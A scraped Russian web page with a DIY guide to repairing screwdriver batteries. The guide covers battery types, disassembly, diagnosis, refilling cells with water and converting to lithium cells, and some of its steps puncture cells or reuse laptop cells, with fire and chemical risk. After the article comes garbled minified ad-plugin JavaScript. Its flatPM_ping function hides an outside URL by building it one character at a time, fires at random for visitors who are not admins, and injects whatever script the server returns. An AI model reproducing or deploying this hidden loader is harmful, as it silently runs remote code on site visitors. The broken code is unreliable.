Завершая строительство дачи, в которой планируем жить круглогодично, столкнулись с необходимостью под. читать весь отзыв

Обратились в компанию Форс, чтобы установить теплые полы в доме. Дом новый и вроде построен по уму, а. читать весь отзыв

Как отремонтировать аккумулятор шуруповёрта своими руками

Шуруповёрты используются в различных условиях и степень нагрузки у них разная. Поэтому они отличаются своей мощностью, которая напрямую зависит от аккумулятора. При поломке элемента нужно уметь провести оперативный ремонт своими руками.

Типы аккумуляторных батарей

По конструктивным особенностям различают батареи в виде слайдеров и обоймы.

Аккумулятор шуруповёрта в виде слайдера

Но это несущественные отличия по сравнению с типами батарей. И слайдер, и обойма используется в разных типах батарей.

Аккумулятор шуруповёрта в виде обоймы

Существуют три типа аккумуляторов для шуруповёрта:

  1. Никель — кадмиевые (Ni-Cd).
  2. Никель — металлогидридные (Ni-Mh).
  3. Литий — ионные (Li-Ion).

Литий — полимерные батареи (Li-Pol) не производятся для шуруповёртов. Основные области их применения: смартфоны, сотовые телефоны, планшеты, ноутбуки, радиоуправляемые приборы, электромобили.

Никель — кадмиевые батареи самые дешёвые, быстро заряжаются, имеют более тысячи зарядных циклов. Аккумуляторы устойчивы к эксплуатации при низких температурах. Но они обладают эффектом памяти. То есть заряжать их можно только после полной разрядки, иначе ёмкость будет падать. У них высокий ток саморазряда. Они изготовлены из токсичных материалов и их сложно утилизировать. Эти батареи пользуются самым большим спросом.

Никель — металлогидридные батареи дороже, не токсичны, имеют низкий эффект памяти. Ток саморазряда больше никель — кадмиевых. Ёмкость выше, цикл заряда более пятисот. Эти аккумуляторы хуже переносят высокую скорость разряда. Они меньше подходят для максимального использования мощности инструмента. Их нужно постоянно подзаряжать.

Литий — ионные батареи дороже, мощнее, быстро заряжаются. У них отсутствует эффект памяти. Низкий ток саморазряда. Напряжение элементов аккумулятора больше, поэтому их число меньше. Следовательно габариты и вес таких батарей меньше, чему у никелевых. Но их нельзя разряжать полностью, иначе через несколько таких циклов придётся покупать новый. Чтобы повысить качество литий — ионных батарей, производители устанавливают в корпус батареи или шуруповёрта микросхему, контролирующую работу аккумулятора. Образуется многоуровневая многоступенчатая защита:

  1. От высокой температуры.
  2. От полного разряда. Эти аккумуляторы боятся полного разряда и не могут восстановиться, если разряд будет ниже допустимой нормы.
  3. От короткого замыкания.
  4. От перезаряда, так как может произойти взрыв.
  5. От токов перегрузки.

Контролирующая плата, установленная в корпус батареи, более эффективна. Когда аккумулятор лежит отдельно от шуруповёрта и не используется, микросхема контролирует его состояние и в случае каких-то проблем размыкает цепь. Аккумулятор полностью защищён.

Обзор литиево-ионного аккумулятора с микросхемой

Проблемы с АКБ

Какие могут быть неполадки с аккумуляторами:

  • течёт;
  • не снимается;
  • снизилась ёмкость;
  • не заряжается;
  • уменьшается время заряда и разряда.

Никелевые батареи можно восстановить. А литиевые нельзя, так как в них разлагается литий. Здесь можно только заменить негодные элементы питания.

Как правильно отремонтировать своими руками.

Запаситесь терпением и приступайте к ремонту.

Разбираем аккумулятор.

Разбирайте аккумулятор аккуратно. Не применяйте силу, чтобы не повредить корпус.

  • Снимите аккумулятор с шуруповёрта. Если кнопки заклинило и он не снимается, открутите винты корпуса инструмента и снимите верхнюю половину. Одна из кнопок освободилась. Потяните батарею на себя, слегка шевеля её в разные стороны, и она тоже снимется. Когда вы разберёте батарею, установите кнопки так, чтобы они легко нажимались в своих пазах.
  • Корпус аккумулятора состоит из двух частей и бывает разборным и неразборным. В первом случае открутите все винты и разъедините обе части.

Разборный корпус аккумулятора

Разбор аккумулятора с использованием ножа

Видео: Как разобрать батарею шуруповёрта

Внутри располагаются несколько последовательно спаянных элементов. Такая кассета обеспечивает необходимое напряжение и токовые характеристики для аккумулятора. В некоторых никелевых батареях к элементам прикреплён термодатчик.

Термодатчик никелевой батареи прикреплён к элементам

В литий — ионных аккумуляторах всё сложнее. Там присутствует контролирующая плата, а элементы облачены в защитный корпус или плёнку.

Литий — ионная батарея

Как увеличить ёмкость батареи.

Новый аккумулятор перед использованием необходимо полностью зарядить. Средняя температура окружающей среды от 10 до 40 градусов. На зарядных устройствах имеются лампочки индикации. Когда они показывают, что батарея заряжена, необходимо сразу отключить процесс.

  1. Новые никель — кадмиевые батареи необходимо раскачивать перед первым применением. Три раза полностью разрядить и зарядить. Ёмкость станет максимальной. Если в инструкции к прибору написано, что раскачка должна включать большее количество циклов заряда, то следуйте этим рекомендациям. В процессе работы перед зарядкой полностью разрядите батарею.
  2. Никель — металлогидридные батареи имеют меньший эффект памяти, поэтому их можно раскачать один раз перед первым использованием.
  3. Литий — ионные аккумуляторы не нужно раскачивать. Их достаточно просто зарядить до полной мощности.

Для разряда батареи используется нагрузка в виде лампы напряжением 12 вольт. Она подключается крокодилами к клеммам. Если аккумулятор разобран, то к выводам последовательной цепи элементов питания. Процесс разряда займёт меньше часа.

Видео: Как разрядить аккумулятор

Второй способ правильной разрядки это использование «умного» зарядного устройства типа imax b6, которым очень удобно раскачивать аккумуляторы. В нём можно настраивать параметры тока и напряжения для заряда и разряда батареи. Установить автоматический режим циклирования для раскачки аккумулятора. То есть вам не надо постоянно следить за ёмкостью и напряжением. Прибор сам сделает это за вас. Предусмотрено до 5 циклов. Причём в конце вы сможете увидеть значения тока и напряжения после каждого цикла и проанализировать результат.

Зарядное устройство imax b6

Видео: Обзор зарядного устройства imax b6

Диагностика.

После полной зарядки разберите аккумулятор. Осмотрите элементы на предмет вздутия и окисления. Мультиметром или тестером замерьте напряжение всех элементов. Пределы напряжения для разных аккумуляторов:

  1. Для никель — кадмиевых 1,2 — 1,4 вольта.
  2. Для никель — металлогидридных 1,2 — 1,4 вольта.
  3. Для литий — ионных 3,6 — 3,8 вольта.

Батарейные банки обёрнуты в бумажную оболочку. Напряжение нанесено на каждом элементе. Если у всех банок величина напряжения нормальная, разрядите аккумулятор на половину мощности. Опять замерьте напряжение. Те элементы, у которых напряжение снизилось на 0,5 — 0,7 вольт по сравнению со средним, подлежат восстановлению или замене. Про такие банки говорят «течёт».

Видео: Как проверить состояние аккумулятора

Почему не заряжается.

Если зарядное устройство в норме, проверьте контакты между аккумулятором и зарядником. У зарядника контакты могли разогнуться. Из-за этого батарея не заряжается. Разберите устройство и подогните клеммы. Второй причиной может быть вышедший из строя или отпаявшийся температурный датчик. Его необходимо припаять или заменить на новый.

Быстро заряжается и разряжается.

При окислении и загрязнении контактов аккумулятора, зарядного устройства и инструмента батарея быстро заряжается и разряжается. Периодически протирайте контакты.

Выкипание электролита.

Выкипание электролита происходит из-за ускоренного заряда и перезаряда. Если элементы не вздулись и после полного заряда показывают рабочее напряжение, их можно восстановить без замены. Необходимо восполнить пустующий объём дистиллированной водой.

  • После определения дефектных банок разрежьте соединительную металлическую ленту. Отпаяйте элементы.
  • Возьмите пробойник толщиной не более 1 миллиметра. Там, где у банки находится минус, сделайте отверстие в корпусе.
  • Откачайте воздух объёмом до 1 кубического сантиметра и налейте столько же воды.
  • Эпоксидной смолой загерметизируйте элементы и подключите их в схему.

Если этот способ не помог, тогда замените банки на новые.

Видео: Добавление дистиллированной воды

Замена и пайка элементов питания.

Когда вы провели диагностику и выявили дефектные банки, необходимо приобрести их замену. Новые элементы должны полностью совпадать по размерам и техническим характеристикам.

  • Разрежьте или отпаяйте старые элементы от пластин.
  • На их место поставьте новые. Для соединения используйте те же пластины или медные проводники того же сечения.
  • Чтобы банки не перегрелись пайку делайте быстро. Соблюдайте полярность последовательной цепи. Соединяйте плюс с минусом, а минус с плюсом.

Пайка элементов питания

Видео: Замена элементов в аккумуляторе

Как переделать шуруповёрт под литий — ионный аккумулятор.

Многие владельцы шуруповёрта с никель — кадмиевым аккумулятором сталкивались с такой проблемой, что когда надо им воспользоваться, батарея всегда разряжена. А постоянная зарядка убивает её из-за эффекта памяти. Поэтому переделывают такой аккумулятор на литий — ионный.

Источником литиевых аккумуляторов может стать старая батарея от ноутбука или можно купить новые. Ноутбучные и новые банки незащищённые. Использовать их без защиты нельзя, потому что вы не сможете их зарядить и контролировать разряд. А при перезаряде они благополучно умрут. Допускается соединять параллельно абсолютно одинаковые аккумуляторы, тогда они будут работать как одно целое. Приобретите модуль защиты для последовательно соединённых аккумуляторов, который контролирует каждый элемент в отдельности и заботится о нём. Следит за напряжением и током, обеспечивает защиту от короткого замыкания. Такие модули бывают для одного, двух, трёх и четырёх аккумуляторов.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика